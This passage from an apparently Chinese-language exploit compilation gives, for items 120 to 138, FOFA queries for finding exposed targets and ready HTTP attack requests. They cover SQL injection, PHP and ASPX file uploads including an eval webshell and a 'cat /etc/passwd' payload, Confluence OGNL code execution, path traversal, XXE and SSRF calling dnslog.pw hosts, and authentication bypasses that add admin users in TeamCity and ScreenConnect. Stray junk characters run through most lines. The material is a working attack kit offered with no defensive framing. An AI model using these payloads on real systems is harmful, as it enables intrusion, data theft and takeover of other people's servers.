Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php% m5 t& I9 q; C8 P1 N
Sec-Fetch-Dest: empty! I8 L: h: R0 V3 ?4 j+ s$ x
Sec-Fetch-Mode: cors
9 Z- T/ R" G% f( w4 PSec-Fetch-Site: same-origin; j/ @) P `$ E
X-Forwarded-For: 1.1.1.1
' k( n# D6 |1 ^5 OX-Originating-Ip: 1.1.1.1( ]0 g" Y& o- y4 Z0 O- d4 m8 q
X-Remote-Ip: 1.1.1.1
/ e9 Q; c8 n' Q9 y, b: p8 yX-Remote-Addr: 1.1.1.1, I4 z0 R! E' ]0 g3 W- z
Te: trailers
# {2 U! |- U$ `! ?% P2 vConnection: close1 ]) l! v6 P* k- w3 N8 f% M
/ e' x. O+ w& G. K# z1 k
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
& g1 _$ O" M: U) Q" z) Z$ V
& I3 L. q, L, f; S' H9 X! a2 k
0 m" {" M' U9 p: @120. 北京百绰智能S40管理平台导入web.php任意文件上传
! d' n# T4 J, _4 ^; vCVE-2024-1253
[# G8 ]# @7 W7 P3 i0 GFOFA:title="Smart管理平台"0 `9 i/ A5 ?6 k/ ~
POST /useratte/web.php? HTTP/1.10 P0 Y! ?% h) r0 {, U) S0 W
Host: ip:port( w0 u. ?" u8 R: x: A: Y
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db3 I0 ?; L# q! P" ~/ }7 Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
8 V/ ^ p2 N9 X5 O \! S- mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& g- I* ]: Q1 {) P4 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 c: p$ ?, L; \6 GAccept-Encoding: gzip, deflate1 R; A' E% K3 I/ Z# ?& Y# H \0 R# B
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328 k: Y6 l2 C& l% [# R+ Y
Content-Length: 597; H3 n& c0 x: ]8 N# ^
Origin: https://ip:port* `5 K0 g6 i0 t5 C
Referer: https://ip:port/sysmanage/licence.php
K& e$ h1 p+ n! wUpgrade-Insecure-Requests: 1' |5 t( n/ U7 j% e$ _
Sec-Fetch-Dest: document* ^ I7 Q; c: |
Sec-Fetch-Mode: navigate' ^5 h4 D- J2 \. a/ }* v
Sec-Fetch-Site: same-origin
/ \ H; v" h! w" y- ?! KSec-Fetch-User: ?1
, O: [0 D- S! o7 eTe: trailers
$ R2 p ~8 E+ CConnection: close
9 J/ [$ q; M5 m* |; [. c4 T# s+ m6 g1 F5 S
-----------------------------42328904123665875270630079328+ d! C' p* F; n0 d2 T2 Z! h
Content-Disposition: form-data; name="file_upload"; filename="2.php"
. x2 J/ ?1 p6 s6 T& @1 e' y9 JContent-Type: application/octet-stream
" {6 }" M0 ~. r+ G2 b% c0 g
, F: f+ h: E8 ^/ D' C0 N8 I& E<?php phpinfo()?>$ g4 }" V% R" h+ V
-----------------------------42328904123665875270630079328+ I) B/ U" {& n
Content-Disposition: form-data; name="id_type" E3 g$ e8 W p {6 a/ n
6 B! W* n/ G% K2 E# d: c- d* ]
1# O6 G5 ^3 D0 D$ g* {+ r
-----------------------------423289041236658752706300793287 d1 ~6 Z, t0 |, ` D% F. I: Q
Content-Disposition: form-data; name="1_ck"# h7 U. z5 ]; L; ?+ } T& t A
: ]) Y+ m2 c5 Y1 }
1_radhttp% G5 w1 O- W; Y
-----------------------------42328904123665875270630079328
e8 h0 ~ k$ k& Z$ rContent-Disposition: form-data; name="mode") T& _0 ~9 u% f; I! t
) V! B5 }, a# C( n) Cimport
. L y8 }4 R) i9 H-----------------------------42328904123665875270630079328
5 ?2 J ]' K5 E0 k$ {- e' L# G+ D
, W6 N; W! y2 g5 B% q- b
# H3 I' Z7 z H6 A) p1 J文件路径/upload/2.php
( O3 `- D. u' ]4 Z. f3 G' g% F. [7 F, C+ a' Y
121. 北京百绰智能S42管理平台userattestation.php任意文件上传6 r1 z1 v3 M9 K6 p! ~: p% W
CVE-2024-1918' @2 D, G& T% x% m* B
FOFA:title="Smart管理平台"$ [! l/ r5 T+ r( H" ~
POST /useratte/userattestation.php HTTP/1.13 B: M; ^8 U& I$ Y! j3 y6 c
Host: 192.168.40.130:8443( |( [" W/ \5 p! j9 ^' T
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac507 w5 M" ~3 o8 q0 V; R
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
) q* d% U' @1 F( v4 [1 }5 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! C5 r- `3 X) s1 A* a3 F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. V( [) T7 ~8 A) f: l- E- P* N
Accept-Encoding: gzip, deflate
- l( \3 {, [7 P+ PContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328% D7 q/ V- H( m* p/ H
Content-Length: 5924 j o' {9 X1 \! A, m
Origin: https://192.168.40.130:84437 d+ p; }( @8 |) g
Upgrade-Insecure-Requests: 1
6 j! \" B- m8 u7 V% QSec-Fetch-Dest: document
, u0 Y# I) R8 L% C& CSec-Fetch-Mode: navigate
: c$ f% I9 E& R: fSec-Fetch-Site: same-origin
- }% T5 W8 n" I8 i: R PSec-Fetch-User: ?1
+ N+ s2 N: ]- K/ XTe: trailers
( F& f: S. f7 ]. U5 xConnection: close7 G# h7 o% H) Y) Z
% w4 O8 t" O( R9 a1 I4 }/ R8 {
-----------------------------42328904123665875270630079328. M: Z# \' U$ }8 \* T6 u0 e. w/ [
Content-Disposition: form-data; name="web_img"; filename="1.php"
% p$ p5 C! e) `; A3 c' _/ l* @$ v- GContent-Type: application/octet-stream
2 B. t, i1 @- w1 Z8 j1 ?; ^4 \0 l& C0 w( ^
<?php phpinfo();?>8 m8 I* ~9 @3 F1 h- e+ e3 c
-----------------------------423289041236658752706300793288 g6 b+ S; k# H# r
Content-Disposition: form-data; name="id_type"
r1 b- T7 Z! C" i
4 ]& L2 w# f% x# s4 w$ c1
/ d+ K8 G+ {; f q( B) t1 |-----------------------------42328904123665875270630079328
8 Z6 k5 [) |+ n+ DContent-Disposition: form-data; name="1_ck"1 |4 T! g( N: w9 e
4 k q+ D8 ^+ T' u U8 D. L) {
1_radhttp, W# ~! W+ o ?0 d. \3 M1 I$ i; M; q
-----------------------------42328904123665875270630079328
$ t, q; H8 X6 l$ e% j; z1 SContent-Disposition: form-data; name="hidwel"+ B! l/ j$ h: o8 r% b. \( L( m7 W
- u$ A. O2 j/ B% n6 `' ?) b4 _; Dset
& T6 y9 R. A, m- q-----------------------------423289041236658752706300793287 e/ Y! O- U1 d* g+ G
5 | A8 }6 h; i
, {' z l$ |1 x# A6 J0 nboot/web/upload/weblogo/1.php
0 ~( Y7 W4 U* W; C; R8 [3 q8 j/ { [6 f* \' {
122. 北京百绰智能s200管理平台/importexport.php sql注入
2 f: f( K) }' G) m. Z% ~7 DCVE-2024-27718FOFA:title="Smart管理平台"
+ V9 G: v6 A U! A( n3 H其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
b" I2 x- b" X. d/ g8 nGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
' `7 s" _( B" l9 r& H6 F% m& J% nHost: x.x.x.x
0 v' p7 W: y% M, o* M5 BCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
* T% T1 B' U! e1 ~( }# gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 K9 G' b3 j+ w7 n! O3 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 _" r2 T( R8 ^0 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% o! Y+ L( ` I, c) S
Accept-Encoding: gzip, deflate, br- O: u" K- O _ b: [$ p
Upgrade-Insecure-Requests: 1
+ j7 p( b) x" X) v3 L, k3 jSec-Fetch-Dest: document0 R; x) Y' j8 k4 i
Sec-Fetch-Mode: navigate
& P: G+ N1 R! V+ ASec-Fetch-Site: none
1 |, _' u/ X" z i4 a! I; ySec-Fetch-User: ?1% k1 |5 a3 l! C$ h& N
Te: trailers
' ^: c2 n6 z1 D8 [& tConnection: close
, B' l, Z$ s' u8 R' N: P7 E3 R- D3 I: f+ g
' q1 H, [2 c) t$ ^3 g! W
$ S, P7 Z' J4 C, f7 h123. Atlassian Confluence 模板注入代码执行
: R" c& u: v9 ] l; YFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"3 Z8 ~$ w1 |& K0 n) w( q9 B* f
POST /template/aui/text-inline.vm HTTP/1.1
) h N4 K: e3 c! |Host: localhost:8090: @" q* [& j4 B% C- ~
Accept-Encoding: gzip, deflate, br
: N7 V2 f" @+ XAccept: */*1 h- Y3 B* P2 I8 m) c( [
Accept-Language: en-US;q=0.9,en;q=0.8
1 w A+ V! }$ F0 H' sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36, q; U0 s' s) F8 A6 i# f- }# y9 [# m! e
Connection: close: m' Z1 h) B' ?
Content-Type: application/x-www-form-urlencoded8 `& n L4 T& N6 `% H$ r
- A0 @1 f! e. `label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
, n% r1 Z1 \9 F0 E' S; g2 }5 ~1 s' g( R" C& F
% Q; I5 t2 o4 C124. 湖南建研工程质量检测系统任意文件上传( p7 ]5 d/ W# Z p& I1 B/ U3 u
FOFA:body="/Content/Theme/Standard/webSite/login.css"4 Z& e0 D. _/ u" }3 y# L
POST /Scripts/admintool?type=updatefile HTTP/1.1 P+ e) D( X. ?" v& U9 a
Host: 192.168.40.130:82828 q3 Z& o0 S. [9 w
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.366 m0 f# w% ]/ g; w
Content-Length: 72
% t+ [5 r$ W! E$ I, ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
) w0 A% B. ^- |/ L% v# kAccept-Encoding: gzip, deflate, br
$ ^$ K& ]) U$ k$ t& R+ `. hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# Q' Z% g% ?8 Z/ d7 {, _
Connection: close1 y7 A/ _( _3 R" T' Y
Content-Type: application/x-www-form-urlencoded
/ B; D- C Z( m% U9 n( Z9 C9 C# a
3 P' j! P. o0 w0 ]8 S- a2 OfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>6 e) M& n8 |: e$ g/ J4 ~
0 J a2 {1 G6 j5 ?9 D2 _
. T+ N( G4 E/ b$ i8 S
http://192.168.40.130:8282/Scripts/abcgcg.aspx8 e# L6 @6 i5 n& i) o# r- e7 J5 H9 m
2 D4 {2 x, q6 _" x {: n$ R
125. ConnectWise ScreenConnect身份验证绕过* {& X( m1 h3 ]# u, Z' ^5 X; u0 m
CVE-2024-1709
0 z# [9 y7 y$ H' OFOFA:icon_hash="-82958153"
# L7 H: X: r; S+ n) R* ehttps://github.com/watchtowrlabs ... bypass-add-user-poc1 q8 n2 @ ?4 x" s/ i
, n* O2 o& V0 b3 z4 y8 J V
& S- l) ]+ T, P/ d9 H+ k9 V7 n+ r
使用方法
; z$ h, m; P- |" i2 |2 y+ tpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
( j- x8 O$ e) x
: z# u- o# d" o- \0 [- ~
% E9 p* T% r/ r- f6 E1 Q2 ^! ~6 r8 i/ {. X创建好用户后直接登录后台,可以执行系统命令。. U$ N! x- [" W! u
1 p* e. g4 P1 A" l
126. Aiohttp 路径遍历
% p4 G1 T- z) n. D0 |/ LFOFA:title=="ComfyUI"
' e7 z8 j$ X* R- `5 cGET /static/../../../../../etc/passwd HTTP/1.1
# W* d; l1 H. G& [( jHost: x.x.x.x
( T: ?. K* F1 j4 g k* qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
}$ q% b* u: Q2 W* p' |& D- pConnection: close9 L! L* K6 M s1 `
Accept: */*$ o, b+ V) P1 J, t! d" S: V3 `
Accept-Language: en$ k$ W& k* ?) q' m- E% Z/ b$ M
Accept-Encoding: gzip& }2 F/ f, Z/ g- C
' i" t$ S' H% d, ?4 {* Z( K
$ _& w( `6 V: M# d" G. U1 s
127. 广联达Linkworks DataExchange.ashx XXE/ v$ C+ G6 U+ A* d% V, w+ y' W! t1 y
FOFA:body="Services/Identification/login.ashx" ' H& M7 Z8 }8 [$ S. }" l
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1% h/ u8 y5 o9 S* _, x1 y
Host: 192.168.40.130:8888& _" U; W1 X& P- P" i# c2 ~ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36- ~7 H. c; o; g* K4 k
Content-Length: 415
* ~" e0 H" c1 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 X2 D% I1 M7 f! hAccept-Encoding: gzip, deflate% x5 t4 u1 y8 e4 \: P j
Accept-Language: zh-CN,zh;q=0.9( Q- t- y; z5 d
Connection: close" S4 d! B6 \! J5 ]: k
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0) `3 p) P, m, u" U/ e4 z
Purpose: prefetch
6 ]. K! P$ E: Z* qSec-Purpose: prefetch;prerender9 n4 c" e+ k6 n5 ?/ T5 k
! N2 j# {) e1 C) E+ E! z: p------WebKitFormBoundaryJGgV5l5ta05yAIe0+ i# S: n# b# R7 S! Z v g2 p6 X
Content-Disposition: form-data;name="SystemName"4 f7 a' Q: t; g U( w4 W. q6 t
. P9 u7 y* u9 X1 H
BIM
5 ?1 j _ w1 A; k. W9 T------WebKitFormBoundaryJGgV5l5ta05yAIe0
5 \# |, G5 C6 v8 \- w( z# xContent-Disposition: form-data;name="Params" i, S0 O) E; n
Content-Type: text/plain
$ E1 C" d' o. B0 O2 r" y1 t0 {
, \ M+ m* `; |# z+ U4 X, q<?xml version="1.0" encoding="UTF-8"?>
' t1 z3 A1 M6 X& ^$ |<!DOCTYPE test [+ M& Q! K4 Z# j& T4 N2 V+ s
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">1 E& v+ u7 f& u4 f- n1 I
]( v8 _1 c' \8 {1 G
>) G# H7 n9 ^% F
<test>&t;</test>
. h6 u* c' U3 V# X5 i/ Z- U2 J------WebKitFormBoundaryJGgV5l5ta05yAIe0--6 k/ y- e* b* u2 |4 e$ H6 g4 A
6 q2 S! K: @9 R- S3 q) j! n/ r. `; m. I. r: Z# Q( c
- r3 \+ R' N3 ]4 Y0 x) u0 d7 @128. Adobe ColdFusion 反序列化
6 c' h2 c6 p& ^+ K' |3 O0 D+ aCVE-2023-38203
3 o( ]1 n5 J' M+ bAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)* n5 C: j/ t* n: T
FOFA:app="Adobe-ColdFusion": t; n$ f. `. Q4 X( t- ` j
PAYLOAD
. x6 b' r+ j& f' w! r+ P8 N7 X+ R! }1 W
129. Adobe ColdFusion 任意文件读取
@: j8 H- G2 ~( B t: ?1 ]$ f' vCVE-2024-20767" a+ {8 R, A' Z. N: U
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
! t* J2 R0 ?: e+ i3 ~6 Y第一步,获取uuid
$ Q+ F+ ]9 ^: [GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.10 A2 |; A) |* D1 f
Host: x.x.x.x S" s* X+ N Y8 T: e4 L% J5 n) G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* T D& ^# G( a. t/ s
Accept: */*
7 _1 P- w% ^) \$ |6 U6 sAccept-Encoding: gzip, deflate
" ]' ~, k9 ~( aConnection: close
/ a' S) y% R; }9 r
% J( P! g( K" |, b1 G! \) L P- T
1 b) x, h! M8 A/ b! D4 ?# F* R; Q第二步,读取/etc/passwd文件
0 B( e1 r1 C7 c6 eGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.18 Y- b8 U! w5 K h. s& o
Host: x.x.x.x3 ^1 e# t8 D2 q8 Y- o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 E; p3 B5 U, i: o
Accept: */*
+ k+ Y0 T0 u" [Accept-Encoding: gzip, deflate
0 Q: I# j# X6 hConnection: close
- v( P D7 U! [+ j7 j( G' o9 puuid: 85f60018-a654-4410-a783-f81cbd5000b9
" J) {. Q5 R- C9 b' p" S I1 S( t9 p, G! H3 P
9 y/ T8 n7 ~0 Y" A6 z
130. Laykefu客服系统任意文件上传
! J' b6 h5 a6 lFOFA:icon_hash="-334624619"
0 a' f0 p; V0 i5 D, C4 @- EPOST /admin/users/upavatar.html HTTP/1.10 o; J: e i8 R( m
Host: 127.0.0.1
7 v3 P F! B C# R# J" [5 B9 v* ^: tAccept: application/json, text/javascript, */*; q=0.01
* O* ~" S0 x& C& K( s1 `. JX-Requested-With: XMLHttpRequest
2 y& I" Y; z4 K. r) U$ d! PUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
6 B+ E0 p) L* ~( x9 p; A0 H5 E* RContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
- t. J) V8 O5 x: v$ R. e1 x8 PAccept-Encoding: gzip, deflate
1 A! N9 y, Q7 C# I9 R- U; l( uAccept-Language: zh-CN,zh;q=0.9
R' d: G7 o* r* ]& xCookie: user_name=1; user_id=3
% P0 y' r& P6 a6 b2 z) wConnection: close9 x0 L( ]7 z% D4 i* w4 m; e2 w
$ {6 C6 ~9 ` E, r- T) J# P
------WebKitFormBoundary3OCVBiwBVsNuB2kR
2 X0 ?9 O5 Y5 q5 z+ V' `Content-Disposition: form-data; name="file"; filename="1.php"* ^. ]+ U8 h6 |7 `0 ~, {5 I
Content-Type: image/png
. w4 B: o- Y) ~9 L9 W1 `. f
* u) j% z) K; x; p# S1 }9 h<?php phpinfo();@eval($_POST['sec']);?>- f) B* \9 L! x0 T: K. R
------WebKitFormBoundary3OCVBiwBVsNuB2kR--2 }" \' h% s, b# `
5 T' X# R( G# e6 x3 j/ N
$ c# G( @- ^' j131. Mini-Tmall <=20231017 SQL注入
& a! a% Y7 Z; U7 [! o% F% aFOFA:icon_hash="-2087517259"- Q; f5 n/ J( i# H0 v: D
后台地址:http://localhost:8080/tmall/admin+ c& A! v: b) t7 m6 f
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
: U, m, K9 L3 H- p2 \& Z E# Z3 F( Q/ p/ \( y; H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
8 ? D0 a9 G, e9 ^7 s1 Q% u- XCVE-2024-271988 N S) ~7 ]+ y f8 d- Y# ?
FOFA:body="Log in to TeamCity"
, x3 b o/ D8 Q; q1 v6 ePOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
. t- [9 G: q) K' \' e/ u9 e$ NHost: 192.168.40.130:8111: |) M& ]- W( o3 b/ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 `$ e$ f: \. K) w! a& iAccept: */*
0 W" B% @/ @# x, U3 BContent-Type: application/json# b* }) o. M, n- W
Accept-Encoding: gzip, deflate; I2 Y! |3 J3 d1 ^3 z! D( C' A( }3 M
$ A1 N7 g, u8 T+ O/ x5 u
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
* p/ j; L4 ~" ^0 C1 E/ l
4 n' o4 X. q3 E$ v% @! w, g8 L. ?
. e& s, [( O& Y7 r0 E3 `$ C3 u) BCVE-2024-271999 _% L) f; O f( [- U
/res/../admin/diagnostic.jsp+ x/ s+ ^- [: g! B
/.well-known/acme-challenge/../../admin/diagnostic.jsp1 ~) c3 C M- { N4 {- G
/update/../admin/diagnostic.jsp, S1 o% r3 h3 I+ K
6 {' n7 D b! ?# S! b/ i
, e; e0 X& v- K2 B2 U* d: aCVE-2024-27198-RCE.py
/ ?" y+ O0 j8 e
, a t; I) e/ t0 K! {5 C133. H5 云商城 file.php 文件上传+ g/ g! @, ?; U1 s' b7 I/ }! n( h, e
FOFA:body="/public/qbsp.php"
5 k4 h4 g" u1 g) W' lPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
0 F9 p w! E8 B% Y) [9 @Host: your-ip
$ W; u1 c/ f6 t9 n0 E& h7 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# _3 w9 H! }: K' k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
4 t) `" u/ F3 i3 Q) Z$ h5 B# m8 A5 G4 F8 E1 L
------WebKitFormBoundaryFQqYtrIWb8iBxUCx3 X4 B$ ], k) E+ p0 ^2 v
Content-Disposition: form-data; name="file"; filename="rce.php"
( k% W: W6 A: MContent-Type: application/octet-stream
+ q% o% D4 ]9 {0 i1 |/ S3 T$ w2 W 6 v, q, r( |4 Q! n7 c$ {! T9 l
<?php system("cat /etc/passwd");unlink(__FILE__);?>9 M0 N2 d- q* [: m, {
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
1 q& E# ]" ^. F6 }$ d5 p" O0 N) ~$ B) `4 U" I7 X
# p; m+ ]9 b+ j7 M( h
& a0 n! q9 b1 |; u134. 网康NS-ASG应用安全网关index.php sql注入6 W) P1 A1 W1 R9 W4 x% y @
CVE-2024-2330
0 w" n9 w2 N; R* rNetentsec NS-ASG Application Security Gateway 6.3版本5 c3 H$ a& I {
FOFA:app="网康科技-NS-ASG安全网关"
& s7 E3 d# M/ f7 [; H+ Y' I8 bPOST /protocol/index.php HTTP/1.1) M6 m+ ^+ P& B0 Z
Host: x.x.x.x9 x2 J1 R G' Q, B" U
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
% O! `% w6 M. r- F0 p) |4 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
) B8 e# ~, V0 A$ ?1 ^+ TAccept: */*4 G2 {, ^0 f% O2 M5 M9 Q _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 t4 ]! P3 u9 N( g
Accept-Encoding: gzip, deflate
" } H' t7 y: `8 ^4 ^& ^4 `! v5 WSec-Fetch-Dest: empty
) P5 T9 C( Q4 T3 fSec-Fetch-Mode: cors
7 L/ C# s- J1 F( d8 _Sec-Fetch-Site: same-origin
d1 j% g: i- x( lTe: trailers
' s, b8 P' r: W4 T7 fConnection: close" e8 |! a# _6 m$ [3 A
Content-Type: application/x-www-form-urlencoded
6 t. O6 O: q5 N* n/ `. eContent-Length: 263
6 s6 _; C' Z# V
! P7 g& R8 E) X4 O- D5 r, \( Gjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}3 l+ }7 X) h) X, F$ R7 v: l+ [- w0 z
3 ^: N/ ], O# {1 [8 U/ c; C& h/ G
# S8 u2 h( P3 A135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入: H: f4 l( N- B+ } E
CVE-2024-2022' i A4 _" z+ {: Y
Netentsec NS-ASG Application Security Gateway 6.3版本
* }! }8 Z% R. ^7 n, V3 V: e) uFOFA:app="网康科技-NS-ASG安全网关"
" S' z& k' i1 {. Q+ w7 S; w: l- mGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1% s+ @+ h' k Y1 x2 @. U; s) d' F, i
Host: x.x.x.x
; J# G! ], g: d7 r: sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- G( d/ _5 @7 F. }6 \9 U, ^ k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* x2 C- V1 I% E9 i+ X8 m
Accept-Encoding: gzip, deflate' i2 i+ y- L9 t; L; q/ i6 Q
Accept-Language: zh-CN,zh;q=0.9. }# w8 U, g1 S) x+ e, x, X
Connection: close3 `0 m* ?+ h3 D X9 t
0 f, U: e" v" B$ F# J5 k
; n4 T6 F9 q; a/ v* }& ~
136. NextChat cors SSRF. s, {- d$ I! S& P+ x* `) ~. K8 Z
CVE-2023-49785
& m7 @4 ^# J0 e' [8 c4 ^! o$ W! dFOFA:title="NextChat"' k0 {" I) t. V5 @* J/ _
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.12 J# [% E3 R: r0 n
Host: x.x.x.x:100007 z0 Q% `/ D7 z: \% p U' t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 H9 s! V4 f7 e P2 c( RConnection: close
7 g+ |% c( H( E5 o) J" n6 x" G2 tAccept: */*
1 s$ a% A. k# _# m/ G/ j* `Accept-Language: en3 T2 ^* a; b- ]- |- g" |
Accept-Encoding: gzip! f: D# t6 u$ J' ]
! j8 j4 ^9 M7 r0 Z- p! u6 c& k- w0 c4 i& B3 K; X3 R
137. 福建科立迅通信指挥调度平台down_file.php sql注入% ?7 U& I9 A1 q& h' K* I3 D
CVE-2024-2620
( z2 B& e1 G8 Q, K: w- K w1 b* qFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. N y4 x2 c. N$ p. D) {5 [. N# C# QGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.17 F! h( d. h( Q4 C
Host: x.x.x.x0 F4 T, w9 K( m! N* A; L$ ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 X8 |: S" \$ C; t, I; N0 W/ a9 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# I6 N6 A5 A* Q& g( _3 g1 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. F: }/ j0 [7 A* U- T# `6 U% p: b4 n
Accept-Encoding: gzip, deflate, br
3 g6 b/ k) L- e* L7 }9 N6 u- O% X* VConnection: close
* U5 z2 I' y/ \8 a! {, ZCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
" ~, e. U1 k) p+ X+ s3 L& m3 @Upgrade-Insecure-Requests: 1
8 s! A7 [, g M# u
& t# B0 t7 T+ ]7 r: L3 x, a0 B' c) {7 B5 h8 b6 d
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
% o5 G7 A3 U) G' H1 qCVE-2024-2621 w# {. I& }. X; J2 P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% O: u+ D2 V4 m7 l% f( v! \GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
- V9 ?: D y3 N4 o0 e) N1 NHost: x.x.x.x. Q1 e5 j' j5 |: H& z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ v# v6 d- U& pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
